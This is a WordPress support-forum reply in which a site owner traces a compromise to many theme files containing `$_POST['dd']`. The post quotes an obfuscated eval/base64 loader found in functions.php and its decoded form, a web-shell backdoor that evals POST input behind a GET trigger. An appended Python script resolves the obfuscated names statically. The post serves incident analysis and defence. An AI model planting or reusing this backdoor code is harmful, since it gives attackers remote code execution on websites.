Reply To: Bug or not in acf.php

  • Hello John,

    I think that's right, and maybe it's not a problem with your plugin (I was thinking that because I just found “acf.php” yesterday).

    When I look for “$_POST['dd']” in the directory, I have many more files, modified more than 1 month ago…

    I found these files:

    wp-content/themes/yoo_balance_wp/comments.php
    wp-content/themes/yoo_balance_wp/sidebar.php
    wp-content/themes/yoo_balance_wp/changelog.php
    wp-content/themes/yoo_balance_wp/404.php
    wp-content/themes/yoo_balance_wp/footer.php
    wp-content/themes/yoo_balance_wp/config.php
    wp-content/themes/yoo_balance_wp/layouts/attachment.php
    wp-content/themes/yoo_balance_wp/layouts/template.config.php
    wp-content/themes/yoo_balance_wp/layouts/template.php
    wp-content/themes/yoo_balance_wp/layouts/_post.php
    wp-content/themes/yoo_balance_wp/layouts/page.php
    wp-content/themes/yoo_balance_wp/layouts/page.php
    wp-content/themes/yoo_balance_wp/layouts/module.php
    wp-content/themes/yoo_balance_wp/layouts/single.php
    wp-content/themes/yoo_balance_wp/header.php
    wp-content/themes/yoo_balance_wp/index.php
    wp-content/themes/yoo_balance_wp/functions.php
    wp-content/themes/yoo_balance_wp/functions.php
    wp-content/themes/yoo_balance_wp/cache/index.php

    About:

    /home/www/podologue/wp-content/themes/yoo_balance_wp/functions.php

    I found this at the beginning:

    <?php
    $O00OO0 = urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
    $O00O0O = $O00OO0{3} . $O00OO0{6} . $O00OO0{33} . $O00OO0{30};
    $O0OO00 = $O00OO0{33} . $O00OO0{10} . $O00OO0{24} . $O00OO0{10} . $O00OO0{24};
    $OO0O00 = $O0OO00{0} . $O00OO0{18} . $O00OO0{3} . $O0OO00{0} . $O0OO00{1} . $O00OO0{24};
    $OO0000 = $O00OO0{7} . $O00OO0{13};
    $O00O0O .= $O00OO0{22} . $O00OO0{36} . $O00OO0{29} . $O00OO0{26} . $O00OO0{30} . $O00OO0{32} . $O00OO0{35} . $O00OO0{26} . $O00OO0{30};
    eval($O00O0O("JE8wTzAwMD0iUHh0RFFxZnpZYWhtd0N2Wk51
    QmpMWHNNVWtJS0piSEVXT2dGeVZBU0dpUm5sVGRjcm9wZU5GU0JIREpreFViS1lDc0VHWHRmakl3cW5ocEF6Z1JsV1Z2ZW9UeW1hdUxkaU9yY1BaUU1OQjlZVVJ5R0N1TEtyV1NGcEIwdkhDTEpMMFRuV29yS3JXU0Z6MTA3cGFpS0F
    DTEtyV1NGcEIwOXBDcjB6b2k3RVdHWmdvYnlFSUViZ0N2aEkxdE5uMUxnejJFMXgyUzVnM24wcWtwRnoxMFFBT1NpTWFpMFYzMEdDS1RmVWE4dnhJdFFuS1RGcldUa3JDdlFWWTBBRWRUWHgzTFFnMjR2eEl0UW5LVEZyV1RrckN2UU
    1ZMEFDV2lLQWx5aEkwcmVUZXdkZzN5ZElteTlObXlkeDJiaXgyd2RBSDBBQ0hpN0JIWnpDbXRvRUlMMWNLNHZwS0dzZ0s1aXgzTER4SzFzcktUUWMyOVBwZndHQ3ZoenBhVDRVSUhaQU93R0N2aHZwQ3l2SkgwQUpIMEFOazQ9Ijtld
    mFsKCc/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwLCRPTzAwMDApLCRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
    ?> 

    That means:

    
    <?php
    $fukq = @$_GET['fukq']; if($fukq == 't'){echo(@eval($_POST['fuckyou4321']));exit;}
    echo apiRequest();
    function apiRequest(){
    	if(@$_GET['op'] == 'check')
    		{
    		 return "connectjbmoveisok";
    		 exit();
    	    }
    }
    ?> 
    

    So I think it’s not the right place, and it’s not your plugin.

    Sorry for the time you lost!
    I'll continue to analyse.
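
The header of the functions.php sample in the post above builds its function names one character at a time from a URL-encoded lookup table. As an added example (not part of the original post and not code from the plugin or theme), this Python script resolves those names statically, without running any PHP; `resolve_names`, `decoder_aliases` and the `DECODERS` list are names and values assumed here for illustration.

```python
import re
from urllib.parse import unquote_plus

# Header of the functions.php sample quoted in the post; the eval() line is left out.
SAMPLE = r'''
$O00OO0 = urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
$O00O0O = $O00OO0{3} . $O00OO0{6} . $O00OO0{33} . $O00OO0{30};
$O0OO00 = $O00OO0{33} . $O00OO0{10} . $O00OO0{24} . $O00OO0{10} . $O00OO0{24};
$OO0O00 = $O0OO00{0} . $O00OO0{18} . $O00OO0{3} . $O0OO00{0} . $O0OO00{1} . $O00OO0{24};
$OO0000 = $O00OO0{7} . $O00OO0{13};
$O00O0O .= $O00OO0{22} . $O00OO0{36} . $O00OO0{29} . $O00OO0{26} . $O00OO0{30} . $O00OO0{32} . $O00OO0{35} . $O00OO0{26} . $O00OO0{30};
'''

ASSIGN = re.compile(r'\$(\w+)\s*(\.?=)\s*(.+?);')   # $name = expr;  or  $name .= expr;
URLDEC = re.compile(r'urldecode\("([^"]*)"\)')       # the lookup-table literal
TERM = re.compile(r'\$(\w+)\{(\d+)\}')               # one character: $table{n}
# Function names worth a closer look when hidden behind an alias (assumed, illustrative list).
DECODERS = {"base64_decode", "strtr", "substr", "gzinflate", "str_rot13"}


def resolve_names(php: str) -> dict[str, str]:
    """Statically evaluate urldecode() tables and $var{n} concatenations. Nothing is executed."""
    env: dict[str, str] = {}
    for name, op, expr in ASSIGN.findall(php):
        table = URLDEC.fullmatch(expr.strip())
        if table:
            value = unquote_plus(table.group(1))     # PHP urldecode() also maps '+' to space
        else:
            terms = [TERM.fullmatch(t.strip()) for t in expr.split(".")]
            if not all(terms):
                continue                             # outside the restricted subset: skip
            try:
                value = "".join(env[m.group(1)][int(m.group(2))] for m in terms)
            except (KeyError, IndexError):
                continue                             # unknown variable or offset out of range
        env[name] = env.get(name, "") + value if op == ".=" else value
    return env


def decoder_aliases(php: str) -> dict[str, str]:
    """Return only the variables that resolve to a known decoding function name."""
    return {k: v for k, v in resolve_names(php).items() if v in DECODERS}


if __name__ == "__main__":
    for var, value in resolve_names(SAMPLE).items():
        print(f"${var} -> {value!r}")
```

The resolved aliases show which functions the final `eval(...)` line calls on the embedded string, which is enough to decide how to unpack it offline rather than on the web server.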